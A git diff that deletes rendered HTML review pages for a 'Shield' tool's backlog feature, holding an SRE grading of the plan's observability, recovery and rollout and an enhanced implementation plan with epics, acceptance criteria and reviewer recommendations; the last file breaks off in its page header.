+++ /dev/null
@@ -1,129 +0,0 @@
-<!DOCTYPE html>
-<html lang="en">
-<head>
-<meta charset="utf-8">
-<meta name="viewport" content="width=device-width, initial-scale=1">
-<title>Shield Plan Review</title>
-<style>
-  body{font:16px/1.6 -apple-system,BlinkMacSystemFont,"Segoe UI",Roboto,Helvetica,Arial,sans-serif;max-width:920px;margin:2rem auto;padding:0 1.2rem;color:#1b1f24}
-  h1,h2,h3{line-height:1.25;margin-top:1.6em}
-  h1{border-bottom:2px solid #e1e4e8;padding-bottom:.3em}
-  h2{border-bottom:1px solid #eaecef;padding-bottom:.2em}
-  code{background:#f3f4f6;padding:.12em .35em;border-radius:4px;font-size:.9em}
-  pre{background:#f6f8fa;padding:1em;border-radius:8px;overflow:auto}
-  pre code{background:none;padding:0}
-  table{border-collapse:collapse;width:100%;margin:1em 0}
-  th,td{border:1px solid #d0d7de;padding:.45em .7em;text-align:left;vertical-align:top}
-  th{background:#f6f8fa}
-  blockquote{border-left:4px solid #d0d7de;margin:1em 0;padding:.2em 1em;color:#57606a}
-  .meta{background:#fff8e6;border:1px solid #f0d999;border-radius:8px;padding:.6em 1em;font-size:.9em;color:#6a5500}
-</style>
-</head>
-<body>
-<div class="meta">Shield Plan Review · feature <code>backlog-20260527</code> · 2026-05-27 · rendered from markdown (source of truth in <code>reviews/plan/2026-05-27/</code>)</div>
-<h1 id="sre--detailed-findings">SRE — Detailed Findings</h1>
-<blockquote>
-<p>Back to <a href="../summary.md">summary</a></p>
-</blockquote>
-<h2 id="operations-review--plan-grade-b">Operations Review — Plan (Grade: B)</h2>
-<table>
-<thead>
-<tr>
-<th>#</th>
-<th>Evaluation Point</th>
-<th>Grade</th>
-<th>Notes</th>
-</tr>
-</thead>
-<tbody>
-<tr>
-<td>OP1</td>
-<td>Observability plan</td>
-<td>B</td>
-<td>N6 explicitly chooses no telemetry in v1; observability = the <strong>logged warning on doubt</strong> (N3, EPIC-3-S2) plus git history of <code>backlog.json</code> (N4) as the audit trail. Removals are auditable via git commits. Two real gaps: (a) the <em>positive</em> removal path (eager prune / lazy sweep actually removing an entry) is never specified to log <em>what</em> it removed and <em>why</em> it matched — only the doubt path logs. A wrong-but-confident removal leaves no breadcrumb except a git diff with no rationale. (b) No log destination/format defined (stdout? a log file? structured?). For a 3am &quot;why did my entry vanish&quot; investigation, git-revert recovers the data but not the reasoning.</td>
-</tr>
-<tr>
-<td>OP2</td>
-<td>Monitoring &amp; alerting</td>
-<td>C</td>
-<td>Appropriately translated: there's no daemon to alert on, and §7 success metrics define a <strong>manual <code>/backlog</code> audit</strong> cadence as the &quot;health check.&quot; But thresholds that should trigger action are named in the PRD (≥70% reach terminal state, &lt;20% untouched &gt;60d, ≥60% suggestion-acceptance) with <strong>no defined owner cadence or trigger</strong> beyond &quot;periodic&quot; — nobody is told <em>when</em> to audit or <em>what reading</em> means &quot;intervene.&quot; The N2 ~1s budget (the one real performance signal) has a defined breach action (Q1, revisit epic index) which is good, but no way to <em>measure</em> latency is specified — the budget is unmonitorable as written.</td>
-</tr>
-<tr>
-<td>OP3</td>
-<td>Failure mode analysis</td>
-<td>A</td>
-<td>Strongest area. The destructive path (reconciliation removal) is analyzed thoroughly: wrong/over-broad removal via epic-name collision (Risk table + §14 trigger), never-remove-on-doubt as the default-safe stance (F7, N3, EPIC-3-S2), concurrent-write corruption (N1, atomic temp-then-rename + validate-or-refuse), crash-mid-write leaving at most a <code>.tmp</code> (N1), malformed/old upstream shapes degrading to entry-stays not exception (N3). Cascading-failure analog (a manifest/plan shape change silently breaking reconciliation) is named as read-contract coupling (§9, §11) with a &quot;flag this consumer&quot; note. Recovery time is implicit (git revert) but the failure enumeration is excellent.</td>
-</tr>
-<tr>
-<td>OP4</td>
-<td>Backup &amp; recovery</td>
-<td>B</td>
-<td>RPO/RTO analog handled by N4: <code>backlog.json</code> is git-tracked, so any wrong removal is recoverable via <code>git revert</code> — RPO = last commit, recovery is a documented one-liner. §14 adds a real fallback (disable eager prune, fall back to manual-remove-only). Gap: recovery assumes the file is <strong>committed</strong> — there is no statement about <em>when</em> <code>backlog.json</code> gets committed. If capture/removal happen between commits, an uncommitted wrong-removal during a working session is <strong>not</strong> recoverable by git revert (it'd need reflog/stash luck, and the eager prune fires automatically at end-of-run, possibly before any commit). The restore procedure is named but never tested/rehearsed (no eval asserts &quot;revert restores a wrongly-pruned entry&quot;).</td>
-</tr>
-<tr>
-<td>OP5</td>
-<td>Capacity planning</td>
-<td>B</td>
-<td>Directly addressed and well-scoped for a local tool. N2 sets a concrete budget (~1s at ≤~50 features / ~200 entries) with a smart optimization already baked in (open only <code>plan.json</code> files the manifest flags as having a plan, not all of them). The scaling trigger and manual-intervention path are explicit: Q1 + N2 say &quot;above that scale, revisit a project-level epic index,&quot; resolved data-driven post-M3. Gap: as noted in OP2, the budget has <strong>no measurement mechanism</strong> — &quot;revisit if breached&quot; is unfalsifiable without timing instrumentation, and the breach is something a human would only notice as &quot;feels slow.&quot; The N2 numbers are also asserted, not derived from Q2's still-unmeasured volume baseline.</td>
-</tr>
-<tr>
-<td>OP6</td>
-<td>Change management</td>
-<td>A</td>
-<td>The staged rollout is the standout operational decision: M1 ships read/append + manual-remove only; the <strong>destructive automatic reconciliation lands last in M3</strong>, deliberately so the risky path is introduced after the store is proven (§14, milestone deps M1→M2→M3). This is the file-tool equivalent of a canary — the blast-radius feature is gated behind two proven milestones. Rollback trigger is explicit (§14). &quot;Not invoking <code>/backlog</code> is a complete disable&quot; is a clean feature-flag analog. Eval gate (EPIC-4-S1) with RED→GREEN before release is a real merge gate. Minor: no per-trigger kill switch granularity beyond &quot;disable eager prune&quot; (lazy sweep on view has no independent off-switch documented).</td>
-</tr>
-<tr>
-<td>OP7</td>
-<td>On-call readiness</td>
-<td>C</td>
-<td>Translated to &quot;can a future maintainer respond when reconciliation misbehaves.&quot; Partial: §14 gives a runbook-shaped recovery (git revert; disable eager prune; fall back to manual). EPIC-4-S2 commits to documenting capture/view/promote/remove + the three triggers + match key in the command and SKILL.md. Gaps: (a) the operator-facing <strong>diagnostic story is thin</strong> — when an entry wrongly vanishes, there's no documented &quot;how to tell <em>which</em> trigger removed it and why&quot; because the removal path doesn't log its rationale (see OP1). (b) &quot;disable eager prune&quot; is named as the mitigation but <strong>no mechanism</strong> for that toggle is specified anywhere in the plan/stories — it's an aspiration, not a shipped switch. (c) Owner is named (@ashwinimanoj, single maintainer) but there's no escalation analog and the manual-audit cadence is undefined.</td>
-</tr>
-</tbody>
-</table>
-<p><strong>Key Finding:</strong> The destructive path is thoughtfully de-risked by design (never-remove-on-doubt, staged M3-last rollout, git-revert recovery) — but the operational <em>instrumentation</em> around it is missing: successful removals aren't logged with rationale, the N2 latency budget has no measurement mechanism, and the §14 &quot;disable eager prune&quot; mitigation is named without any toggle actually being specified as a story.</p>
-<h4 id="recommendations">Recommendations</h4>
-<table>
-<thead>
-<tr>
-<th>Priority</th>
-<th>Point</th>
-<th>Recommendation</th>
-</tr>
-</thead>
-<tbody>
-<tr>
-<td>P1</td>
-<td>OP7</td>
-<td>Add a story (or task under EPIC-3-S3) for an explicit kill switch — a <code>.shield.json</code> flag (e.g. <code>backlog.auto_reconcile: false</code>) that disables eager prune and lazy sweep independently, leaving manual-remove only. §14 <em>names</em> this fallback as the rollback action but no story ships the toggle, so the documented mitigation is currently unactionable.</td>
-</tr>
-<tr>
-<td>P1</td>
-<td>OP1</td>
-<td>Make successful removals auditable, not just the doubt path. EPIC-3-S2/S3 should log every removal with <code>{entry id, feature, epic, match-kind (id vs name), triggering run, the plan.json path that gated it}</code>. Today only never-remove-on-doubt logs (N3); a confident-but-wrong removal leaves a git diff with no rationale — exactly the 3am case. Define the log destination/format too.</td>
-</tr>
-<tr>
-<td>P1</td>
-<td>OP4</td>
-<td>Close the uncommitted-state recovery gap. Eager prune fires automatically at end-of-<code>/plan</code>/<code>/implement</code>, potentially before <code>backlog.json</code> is committed — at which point <code>git revert</code> (N4) cannot recover the entry. Either (a) commit <code>backlog.json</code> before the destructive prune, or (b) write the pruned entry to a transient <code>.shield/backlog-removed.log</code> so it's recoverable independent of git.</td>
-</tr>
-<tr>
-<td>P1</td>
-<td>OP2 / OP5</td>
-<td>Instrument the N2 ~1s budget. The budget and its breach action (Q1 epic-index) are well-specified but unmeasurable — add lightweight timing to <code>/backlog</code> view (even a debug-gated stderr line) so &quot;revisit if breached&quot; is falsifiable. Without it, the only signal is a human noticing slowness.</td>
-</tr>
-<tr>
-<td>P2</td>
-<td>OP2 / OP7</td>
-<td>Give the manual audit a concrete cadence and trigger. §7 names threshold metrics (≥70% terminal, &lt;20% &gt;60d) but only &quot;periodic&quot; audit — specify <em>when</em> (e.g. monthly) and <em>what reading triggers action</em> so the single owner has an actual on-call procedure rather than an open-ended chore.</td>
-</tr>
-<tr>
-<td>P2</td>
-<td>OP4</td>
-<td>Add an eval that rehearses recovery: assert that after a (simulated) wrong removal, <code>git revert</code> / file-restore brings the entry back. EPIC-4-S1 covers remove/prune/sweep behavior but never exercises the recovery procedure N4 relies on — an untested restore path is a latent 3am surprise.</td>
-</tr>
-</tbody>
-</table>
-<p><strong>Overall persona grade: B</strong> (point grades: A, C, A, B, B, A, C → average 3.0 → B). The plan is operationally mature where it matters most — failure-mode analysis (OP3) and staged change management (OP6) are A-grade, and the destructive path is genuinely well-contained. It loses ground on day-2 <em>instrumentation</em>: removals aren't logged with rationale, the performance budget can't be measured, and the headline rollback mitigation (&quot;disable eager prune&quot;) is named but not shipped as a toggle.</p>
-
-</body>
-</html>
diff --git a/docs/shield/backlog-20260527/outputs/reviews/plan/2026-05-27/enhanced-plan.html b/docs/shield/backlog-20260527/outputs/reviews/plan/2026-05-27/enhanced-plan.html
deleted file mode 100644
index b3fdd559..00000000
--- a/docs/shield/backlog-20260527/outputs/reviews/plan/2026-05-27/enhanced-plan.html
+++ /dev/null
@@ -1,274 +0,0 @@
-<!DOCTYPE html>
-<html lang="en">
-<head>
-<meta charset="utf-8">
-<meta name="viewport" content="width=device-width, initial-scale=1">
-<title>Shield Plan Review</title>
-<style>
-  body{font:16px/1.6 -apple-system,BlinkMacSystemFont,"Segoe UI",Roboto,Helvetica,Arial,sans-serif;max-width:920px;margin:2rem auto;padding:0 1.2rem;color:#1b1f24}
-  h1,h2,h3{line-height:1.25;margin-top:1.6em}
-  h1{border-bottom:2px solid #e1e4e8;padding-bottom:.3em}
-  h2{border-bottom:1px solid #eaecef;padding-bottom:.2em}
-  code{background:#f3f4f6;padding:.12em .35em;border-radius:4px;font-size:.9em}
-  pre{background:#f6f8fa;padding:1em;border-radius:8px;overflow:auto}
-  pre code{background:none;padding:0}
-  table{border-collapse:collapse;width:100%;margin:1em 0}
-  th,td{border:1px solid #d0d7de;padding:.45em .7em;text-align:left;vertical-align:top}
-  th{background:#f6f8fa}
-  blockquote{border-left:4px solid #d0d7de;margin:1em 0;padding:.2em 1em;color:#57606a}
-  .meta{background:#fff8e6;border:1px solid #f0d999;border-radius:8px;padding:.6em 1em;font-size:.9em;color:#6a5500}
-</style>
-</head>
-<body>
-<div class="meta">Shield Plan Review · feature <code>backlog-20260527</code> · 2026-05-27 · rendered from markdown (source of truth in <code>reviews/plan/2026-05-27/</code>)</div>
-<h1 id="plan--shield-backlog">Plan — Shield Backlog</h1>
-<p><strong>Project:</strong> Shield · <strong>Phase:</strong> v1 · <strong>Domain:</strong> backend (Python)
-<strong>PRD:</strong> <a href="./prd.md"><code>./prd.md</code></a> (reviewed <strong>Ready</strong>, composite 3.1) · <strong>TRD:</strong> <a href="./trd.md"><code>./trd.md</code></a> · <strong>Sidecar:</strong> <code>./plan.json</code></p>
-<!-- [from: PM5] Add a 2–3 sentence plain-language executive summary atop trd.md and plan.md before the schema-/pipeline-heavy detail, for non-technical readers who hit these artifacts first. -->
-<p>A project-level Shield backlog: capture (user/agent) → user-driven promotion → reconciliation. Entries are removed when their work commits — eagerly at the end of a promoted <code>/plan</code> or <code>/implement</code> run, lazily on the <code>/backlog</code> view sweep, or manually. Matching is by feature (<code>manifest.json</code> index) + epic (<code>plan.json</code> gate); no ids are stamped.</p>
-<blockquote>
-<p><strong>Review note (P0 — gate 0d):</strong> Before this plan ships, paraphrase TRD §2 so it no longer
-restates PRD §3 verbatim (current 92-char overlap exceeds the 80-char duplication threshold).
-Summarize the problem in technical-framing terms and link to PRD §3 instead of repeating it.</p>
-<!-- [from: Deterministic gate 0d] -->
-</blockquote>
-<h2 id="milestones">Milestones</h2>
-<table>
-<thead>
-<tr>
-<th>ID</th>
-<th>Name</th>
-<th>Depends on</th>
-<th>Outcome</th>
-</tr>
-</thead>
-<tbody>
-<tr>
-<td>M1</td>
-<td>Capture + store + view</td>
-<td>—</td>
-<td><code>backlog.json</code> + schema/validator; capture (user + skill, atomic); <code>/backlog</code> ordered view with manifest status badges; manual remove.</td>
-</tr>
-<tr>
-<td>M2</td>
-<td>Feature + epic association + suggestion</td>
-<td>M1</td>
-<td>Every entry carries feature + epic (existing or proposed-new); agent suggests from manifest/plan; user accept/replace/create-new.</td>
-</tr>
-<tr>
-<td>M3</td>
-<td>Promotion + reconciliation</td>
-<td>M2</td>
-<td>Promotion via transient reference; reconciliation engine (match key, never-remove-on-doubt, drift tolerance); eager + lazy idempotent triggers; eval suite + version bump.</td>
-</tr>
-</tbody>
-</table>
-<hr />
-<h2 id="epic-1--store-schema--capture--m1">EPIC-1 — Store, schema &amp; capture  <em>(M1)</em></h2>
-<h3 id="epic-1-s1--define-backlogjson-schema-and-validator-high">EPIC-1-S1 · Define backlog.json schema and validator <em>(high)</em></h3>
-<p>Define <code>backlog.json</code> shape + JSON Schema with a top-level <code>schema_version</code>, plus a Python validator. Entry: <code>{id, order:int, kind∈{epic,story,task}, source∈{user,agent}, feature, epic, text}</code>. <code>schema_version</code> is set now so future shape changes migrate read-old/write-new.</p>
-<ul>
-<li><strong>Tasks:</strong> author <code>shield/schema/backlog.schema.json</code>; document entry shape + migration policy in <code>shield/skills/general/backlog/SKILL.md</code>; create <code>shield/scripts/validate_backlog.py</code>; ordering = single integer <code>order</code>.
-<ul>
-<li>
-<!-- [from: Backend P1-a] --> **Specify the `id` contract:** type (string), generation strategy (uuid4 / monotonic / slug — pick one and document it), and a schema-level **uniqueness** constraint across `entries[]`. Remove/promote/prune all key off `id`.
-</li>
-</ul>
-</li>
-<li><strong>AC:</strong> schema rejects unknown <code>kind</code> (named error); <code>validate_backlog.py</code> exits 0/non-zero correctly; <code>schema_version</code> + migration policy present; enums constrained.
-<ul>
-<li>
-<!-- [from: Backend P1-a] --> **+ AC:** schema rejects an `entries[]` array containing duplicate `id` values, naming the error.
-</li>
-<li>
-<!-- [from: Backend P2-c] --> Either add a no-op `migrate(doc) -> doc` seam with a unit test, **or** reword the migration AC to "migration *policy* documented (doc-only until schema_version 2)" so it isn't mistaken for working code.
-</li>
-</ul>
-</li>
-<li><strong>Design:</strong> §11 APIs Involved · LLD <code>backlog-store</code> (TODO) <!-- [from: Agile P2] land or stub /lld backlog-store before sprint so this design_ref resolves --></li>
-</ul>
-<h3 id="epic-1-s2--capture-entrypoint-user--skill-with-atomic-write-high">EPIC-1-S2 · Capture entrypoint (user + skill) with atomic write <em>(high)</em></h3>
-<p>Capture usable by the user (<code>/backlog add</code>) and any skill (documented write helper). Atomic temp-then-rename + validate-or-refuse so concurrent capture vs reconciliation can't corrupt the file. <em>Resolves PRD-review P1 (capture interface).</em></p>
-<ul>
-<li><strong>Tasks:</strong> <code>/backlog add</code> (assigns next <code>order</code>); skill-callable write helper (text, kind, feature?, epic?, source); atomic write; validate-or-refuse.
-<ul>
-<li>
-<!-- [from: Backend P1-b, DX P1] --> **Lock the write-helper signature here (do not defer to LLD):** pin name, module path, parameters, return type, and raise-on-invalid behavior — e.g. `capture(text, *, kind="task", feature=None, epic=None, source) -> entry_id` in `shield/scripts/backlog_store.py`. This is the carried-forward PRD-review P1 and the contract every capturing skill builds against; it cannot stay open as TRD §12 Q3.
-</li>
-<li>
-<!-- [from: Backend P1-c, Security P1] --> **Name the concurrency strategy.** Temp-then-rename prevents a *torn* file but not lost updates (two read-modify-writes → last-writer-wins drops an entry). Either document the single-writer assumption explicitly *next to* the N1 threat statement (N5 already says "single actor"), or implement a lockfile / re-read-and-merge / `O_EXCL` temp. Name the atomic primitive used (`os.replace`).
-</li>
-</ul>
-</li>
-<li><strong>AC:</strong> user + skill capture both work; interface documented; mid-write kill leaves no corruption; next <code>order</code>/default <code>kind</code> assigned.
-<ul>
-<li>
-<!-- [from: Security P1] --> **+ AC:** a malformed/partial `backlog.json` on read is **refused with a named error** (validate-or-refuse refusal path), never silently read or truncated.
-</li>
-</ul>
-</li>
-<li><strong>Design:</strong> §5 Functional Requirements · LLD <code>backlog-store</code> (TODO)</li>
-</ul>
-<h3 id="epic-1-s3--backlog-view--ordered-list-high">EPIC-1-S3 · /backlog view — ordered list <em>(high)</em></h3>
-<p><code>/backlog</code> command + skill rendering entries sorted by <code>order</code> with feature + epic + source.</p>
-<ul>
-<li><strong>Tasks:</strong> author <code>shield/commands/backlog.md</code> + <code>backlog/SKILL.md</code>; render sorted; empty-backlog message.</li>
-<li><strong>AC:</strong> ascending-<code>order</code> list with feature/epic/source; clean empty message; command registered.</li>
-<li><strong>Design:</strong> §4 Product Journey</li>
-</ul>
-<!-- [from: DX P2] Specify the badge render format once (EPIC-2-S1 shows 'research ✓ prd ✓ plan –' only as an example) and document a local-dev/dry-run loop in backlog SKILL.md. -->
-<h3 id="epic-1-s4--manual-remove-from-backlog-medium">EPIC-1-S4 · Manual remove from /backlog <em>(medium)</em></h3>
-<p><code>/backlog remove &lt;id&gt;</code> — plain delete for ideas decided against / entries no run will clear.</p>
-<ul>
-<li><strong>Tasks:</strong> <code>remove &lt;id&gt;</code> via atomic helper; confirm-before-delete; clear error on absent id.</li>
-<li><strong>AC:</strong> deletes + persists atomically; absent id = clear no-op error; no history retained.
-<ul>
-<li>
-<!-- [from: Security P2/SE3] --> Note (doc): `git revert` recoverability (N4) covers only entries that reached a commit; a manual remove of an *uncommitted* entry is unrecoverable by design.
-</li>
-</ul>
-</li>
-<li><strong>Design:</strong> §5 Functional Requirements</li>
-</ul>
-<hr />
-<h2 id="epic-2--association--pipeline-status">EPIC-2 — Association &amp; pipeline status</h2>
-<h3 id="epic-2-s1--per-entry-pipeline-status-from-manifestjson-high-m1">EPIC-2-S1 · Per-entry pipeline status from manifest.json <em>(high, M1)</em></h3>
-<p><code>/backlog</code> view shows each entry's feature pipeline status (research/prd/plan) read live from <code>manifest.json</code> — so &quot;prd done, not yet planned&quot; is visible without removal.</p>
-<ul>
-<li><strong>Tasks:</strong> read manifest; render status badges per entry; <code>not started</code> when feature absent; compute at view time (no stored status).</li>
-<li><strong>AC:</strong> badges derived from manifest; prd-but-no-plan shows <code>prd ✓ plan –</code> and stays; absent feature → <code>not started</code>.</li>
-<li><strong>Design:</strong> §7 High-Level Design</li>
-</ul>
-<h3 id="epic-2-s2--feature--epic-association--agent-suggestion-high-m2">EPIC-2-S2 · Feature + epic association + agent suggestion <em>(high, M2)</em></h3>
-<p>Associate every entry with a feature (reconciliation key) + epic (removal gate), either proposed-new; agent suggests feature (manifest) + epic (plan.json); user accept/replace/create-new.</p>
-<ul>
-<li><strong>Tasks:</strong> prompt/accept feature + epic (allow proposed-new); suggest by scanning manifest + candidate plan.json; never block capture.
-<ul>
-<li>
-<!-- [from: DX P1, Agile P1, Backend P2-b] --> **Define the suggestion + match heuristic concretely** (no "best match" hand-wave): the matching method (e.g. case-insensitive, whitespace-normalized substring + token-overlap ranking on feature/epic names), the tie-break/ambiguity rule (→ entry stays, never auto-pick on a tie), and epic-rename behavior. Resolve PRD §9's open "discovery cost" question or land `/lld epic-suggester`.
-</li>
-</ul>
-</li>
-<li><strong>AC:</strong> every entry has feature + epic; ≥1 feature + ≥1 epic candidate proposed when matches exist; capture succeeds with proposed-new when none.
-<ul>
-<li>
-<!-- [from: Agile P1] --> **+ measurable AC:** given a fixture manifest with feature `auth`, capturing text mentioning "auth" surfaces `auth` as the top candidate; a 2-way name tie surfaces both and auto-picks neither.
-</li>
-</ul>
-</li>
-<li><strong>Design:</strong> §5 Functional Requirements · LLD <code>epic-suggester</code> (TODO)</li>
-</ul>
-<hr />
-<h2 id="epic-3--promotion--reconciliation--m3">EPIC-3 — Promotion &amp; reconciliation  <em>(M3)</em></h2>
-<h3 id="epic-3-s1--user-driven-promotion-with-transient-reference-high">EPIC-3-S1 · User-driven promotion with transient reference <em>(high)</em></h3>
-<p><code>/backlog promote &lt;id&gt;</code> launches the user-chosen step (<code>/research</code>/<code>/prd</code>/<code>/plan</code>/<code>/implement</code>) and passes the entry id as a transient runtime reference — never stamped into <code>plan.json</code>.</p>
-<ul>
-<li><strong>Tasks:</strong> <code>promote &lt;id&gt;</code> affordance; forward id as transient reference; document non-persistence; shippable work routes through <code>/plan</code>, direct <code>/implement</code> for rare planless one-offs.</li>
-<li><strong>AC:</strong> promotion starts the chosen step + forwards the reference; reference not persisted to plan.json/stories; tool never auto-routes.</li>
-<li><strong>Design:</strong> §4 Product Journey</li>
-</ul>
-<!-- [from: DX P2] Add an explicit intra-epic dependency note: EPIC-3-S3 (triggers) consumes both EPIC-3-S1 (transient reference) and EPIC-3-S2 (engine) and must land after them. -->
-<h3 id="epic-3-s2--reconciliation-engine-match-key--never-remove-on-doubt-high">EPIC-3-S2 · Reconciliation engine (match key + never-remove-on-doubt) <em>(high)</em></h3>
-<p>Locate feature in <code>manifest.json</code>; if it has a <code>plan.json</code>, check the entry's epic. Match: existing epic → by id; proposed-new → by epic name. Ambiguity/no-match → entry stays. Unknown manifest/plan shapes → doubt (stays), never crash.</p>
-<ul>
-<li><strong>Tasks:</strong> <code>shield/scripts/reconcile_backlog.py</code>; match key impl; never-remove-on-doubt; drift tolerance with logged warning.
-<ul>
-<li>
-<!-- [from: Backend P2-a] --> **State the "epic landed" gate as one precise predicate** and use it everywhere: "an entry is removed when an epic with the matching id (existing) or normalized name (proposed-new) is **present in `plan.json.epics[]`**; story `status` is **not** consulted." F7, the EPIC-3-S2 AC, and the schema currently word this three ways.
-</li>
-<li>
-<!-- [from: SRE P1/OP1] --> **Log every removal with rationale** to a defined destination/format: `{entry id, feature, epic, match-kind (id|name), triggering run, gating plan.json path}`. Today only the never-remove-on-doubt path logs (N3); a confident-but-wrong removal must not be a silent git diff.
-</li>
-</ul>
-</li>
-<li><strong>AC:</strong> plan-committed epic selected for removal, prd-only not; id/name match per case; malformed/old shapes → entry stays (logged), no exception.
-<ul>
-<li>
-<!-- [from: Security P2] --> **+ fixture/AC:** epic-name collision across two different features → ambiguous → entry stays (the one place a wrong removal is plausible; PRD §10 risk / §14 trigger).
-</li>
-</ul>
-</li>
-<li><strong>Design:</strong> §7 High-Level Design · LLD <code>reconciler</code> (TODO)</li>
-</ul>
-<h3 id="epic-3-s3--eager--lazy-removal-triggers-idempotent-high">EPIC-3-S3 · Eager + lazy removal triggers (idempotent) <em>(high)</em></h3>
-<p>Eager prune at end of promoted <code>/plan</code>/<code>/implement</code> (via the transient reference); lazy sweep on <code>/backlog</code> view. Both idempotent; both call the one reconciliation engine.</p>
-<ul>
-<li><strong>Tasks:</strong> eager prune hook at end of <code>/plan</code> + <code>/implement</code>; lazy sweep on view; idempotent remove-if-present; shared engine.
-<ul>
-<li>
-<!-- [from: SRE P1/OP7] --> **Ship the kill switch.** Add a `.shield.json` flag (e.g. `backlog.auto_reconcile: false`) that disables eager prune and lazy sweep **independently**, leaving manual-remove only. §14 names this as the rollback fallback but no story currently delivers it — without it the documented mitigation is unactionable.
-</li>
-<li>
-<!-- [from: SRE P1/OP4] --> **Close the uncommitted-state recovery gap.** Eager prune fires at end-of-run, possibly before `backlog.json` is committed, so `git revert` (N4) can't recover. Either commit `backlog.json` before the destructive prune, or append pruned entries to a transient `.shield/backlog-removed.log`.
-</li>
-<li>
-<!-- [from: SRE P1/OP2,OP5] --> **Instrument the N2 ~1s budget.** Add a debug-gated latency line to `/backlog` view so "revisit if breached" (Q1 epic-index) is falsifiable, not "a human notices slowness."
-</li>
-</ul>
-</li>
-<li><strong>AC:</strong> promotion removes referenced entry at end of run (eager); sweep removes plan-committed entries (lazy); second pass is a no-op (idempotent); shared engine.</li>
-<li><strong>Design:</strong> §7 High-Level Design · LLD <code>reconciler</code> (TODO)</li>
-</ul>
-<hr />
-<h2 id="epic-4--eval-coverage--release--m3">EPIC-4 — Eval coverage &amp; release  <em>(M3)</em></h2>
-<h3 id="epic-4-s1--executable-evals-for-the-backlog-lifecycle-redgreen-high">EPIC-4-S1 · Executable evals for the backlog lifecycle (RED→GREEN) <em>(high)</em></h3>
-<p>Per CLAUDE.md eval mandate: cover capture (user + skill), view + status, manual remove, eager prune, lazy sweep, match-key, never-remove-on-doubt.</p>
-<ul>
-<li><strong>Tasks:</strong> fixtures (prd-only-stays, plan-committed-removed, ambiguous-stays, malformed-stays); evals for each behavior; wire into CI; capture RED + GREEN in PR.
-<ul>
-<li>
-<!-- [from: Backend P1-c, Security P1] --> **+ concurrency eval:** two interleaved captures (and a capture racing a reconciliation write) against the same `backlog.json` assert no corruption **and no lost entry** — the actual N1 threat, distinct from the crash-mid-write test.
-</li>
-<li>
-<!-- [from: Security P1] --> **+ no-stamping eval (F6):** after promotion via `/plan`/`/implement`, assert `plan.json` and story records are **byte-unchanged**. F6 is the load-bearing trust boundary and is currently absent from the eval coverage list.
-</li>
-<li>
-<!-- [from: SRE P2] --> **+ recovery-rehearsal eval:** after a simulated wrong removal, assert `git revert` / file-restore brings the entry back (exercises the N4 recovery path the plan relies on).
-</li>
-<li>
-<!-- [from: DX P2] --> Name the CI entrypoint explicitly (which runner under `shield/evals/`) and the path-filter glob scoping "backlog assets" (e.g. `shield/{schema,scripts,skills/general/backlog}/**`, `shield/commands/backlog.md`).
-</li>
-</ul>
-</li>
-<li><strong>AC:</strong> eval suite under <code>shield/evals/</code> covers all behaviors; self-contained (no API/LLM); PR body has RED + GREEN; CI runs on backlog-asset PRs.</li>
-<li><strong>Design:</strong> §10 Milestones</li>
-</ul>
-<h3 id="epic-4-s2--version-bump--commandskill-docs-medium">EPIC-4-S2 · Version bump + command/skill docs <em>(medium)</em></h3>
-<p>Bump the Shield plugin version (marketplace.json + pyproject where touched) in the same commit as asset changes; finalize <code>/backlog</code> + backlog SKILL.md docs.</p>
-<ul>
-<li><strong>Tasks:</strong> bump <code>marketplace.json</code>; bump touched <code>pyproject.toml</code>; finalize command/skill docs (capture, triggers, match key, manual remove, badges); CHANGELOG.
-<ul>
-<li>
-<!-- [from: Agile P2] --> Add explicit DoD lines: "PR reviewed and merged" and "marketplace version published" so 'done' is unambiguous.
-</li>
-<li>
-<!-- [from: SRE P2] --> Document the manual `/backlog` audit cadence (e.g. monthly) and which §7 reading triggers action — the single owner needs a concrete on-call procedure, not "periodic."
-</li>
-</ul>
-</li>
-<li><strong>AC:</strong> version bumped in same commit; command + SKILL document capture/view/promote/remove + 3 triggers; CHANGELOG mentions the feature.</li>
-<li><strong>Design:</strong> §13 References</li>
-</ul>
-<hr />
-<h2 id="pre-build-action-validate-the-bet-p1--pm10">Pre-build action: validate the bet <em>(P1 — PM10)</em></h2>
-<!-- [from: PM10] -->
-<p>Before committing all three milestones, capture a rough baseline of lost / re-derived future-work
-items over a recent week of Shield usage (from git history or chat logs) to ground the
-operational-savings claim. The PRD itself (§10) flags this as the load-bearing <strong>unvalidated</strong>
-assumption; a cheap baseline now de-risks the whole investment and seeds the §7 success metric.</p>
-<hr />
-<h2 id="carried-forward-from-prd-review-ready-run-_2">Carried forward from PRD-review (Ready, run _2)</h2>
-<ul>
-<li>Capture-from-skill interface defined → <strong>EPIC-1-S2</strong> / TRD §11. <em>(Review note: still open as TRD §12 Q3 — P1 #1 closes it.)</em></li>
-<li><code>backlog.json</code> <code>schema_version</code> + migration → <strong>EPIC-1-S1</strong> / TRD §9.</li>
-<li>Reconciliation read-contract drift tolerance → <strong>EPIC-3-S2</strong> / TRD §6 N3.</li>
-<li>Eager-prune + lazy-sweep idempotency → <strong>EPIC-3-S3</strong> / TRD §5 F8.</li>
-</ul>
-<h2 id="next-steps">Next steps</h2>
-<ul>
-<li><code>/pm-sync</code> — sync epics + stories to ClickUp.</li>
-<li><code>/implement</code> — begin TDD implementation (start at M1 / EPIC-1-S1 once the P0 doc-fix and the EPIC-1 P1s are folded in).</li>
-</ul>
-
-</body>
-</html>
diff --git a/docs/shield/backlog-20260527/outputs/reviews/plan/2026-05-27/summary.html b/docs/shield/backlog-20260527/outputs/reviews/plan/2026-05-27/summary.html
deleted file mode 100644
index f3c13635..00000000
--- a/docs/shield/backlog-20260527/outputs/reviews/plan/2026-05-27/summary.html
+++ /dev/null
@@ -1,235 +0,0 @@
-<!DOCTYPE html>
-<html lang="en">
-<head>
-<meta charset="UTF-8" />
-<meta name="viewport" content="width=device-width, initial-scale=1.0" />
-<title>Review — backlog-20260527</title>
-<link rel="stylesheet" href="../../../../../shield.css" />
-<script defer src="../../../../../manifest.js"></script>
-<script defer src="../../../../../shield-nav.js"></script>
-<script type="module">
-  import mermaid from "https://cdn.jsdelivr.net/npm/mermaid@10/dist/mermaid.esm.min.mjs";
-  mermaid.initialize({ startOnLoad: false, theme: "default" });
-  document.addEventListener("DOMContentLoaded", () => mermaid.run({ querySelector: "pre.mermaid" }));
-</script>
-</head>
-<body data-shield-root="../../../../../">
-<header class="shield-header">
-  <a class="brand" href="../../../../../index.html">🛡 Shield</a>
-  <span class="bar-sep">|</span>
-  <nav class="crumb" id="shield-crumb"></nav>
-  <span class="bar-spacer"></span>
-  <div class="feat-wrap">
